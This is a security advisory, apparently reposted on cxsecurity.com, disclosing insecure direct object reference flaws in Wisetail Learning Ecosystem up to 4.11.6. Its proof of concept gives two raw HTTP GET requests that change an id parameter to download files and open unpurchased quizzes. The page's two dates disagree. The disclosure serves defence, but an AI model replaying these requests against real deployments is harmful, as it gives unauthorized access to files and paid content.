Wisetail Learning Ecosystem 4.11.6 Insecure Direct Object Reference

2018.09.14
Risk: High
Local: Yes
Remote: No
CWE: N/A

Title: MULTIPLE IDOR VUNLERABILITies ON WISETAIL LEARNING ECOSYSTEM (LE) UPTO V4.11.6 *D**ate:* 12/09/2019 *A**uthor:* S. M. Zia Ur Rashid *Vendor Homepage:* wisetail.com *Author Contact: *https://www.linkedin.com/in/ziaurrashid/ *Affected Version:* <= 4.11.6 *Assaigned CVE: *CVE-2018-16970, CVE-2018-16971 *Description:* Wisetail Learning Ecosystem (LE) upto v4.11.6 suffers from multiple insecure direct object reference (IDOR) vulnerability that allows to download files and access to the non-purchased course quiz test via a modified id parameter. *Proof-of-Concep (POC):* *// File Disclosure* GET /eco_download.php?id=2639 HTTP/1.1 Host: xxxxxxx User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: xxxxxxxxxxxxxx Upgrade-Insecure-Requests: 1 *// Access Quiz Test* GET /eco_test.php?id=29 HTTP/1.1 Host: xxxxxxx User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: xxxxxxx Upgrade-Insecure-Requests: 1 *Video POC:* https://youtu.be/l3msLYdI3fI *References:* https://blog.ziaurrashid.com/wisetail-learning-ecosystem-multiple-idor-vunlerability/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16970 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16971 *Regards,* *S M Zia Ur Rashid* Student, Dept. of EEE, International Islamic University Chittagong Student Ambassador, IEEEmadC Public Relation Ambassador, IEEEXtreme Programming Competition 12.0 Webmaster, IEEE Bangladesh Section Student Activities Committee 2018 Webmaster, IEEE IIUC Student Branch (2018) Contact: E-mail <smziaurrashid@gmail.com> *|* Web <https://ziaurrashid.com/> Connect: Facebook <https://www.facebook.com/smziaurrashid.info> *|* LinkedIn <https://www.linkedin.com/in/ziaurrashid>

References:

https://blog.ziaurrashid.com/wisetail-learning-ecosystem-multiple-idor-vunlerability/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16970
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16971


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top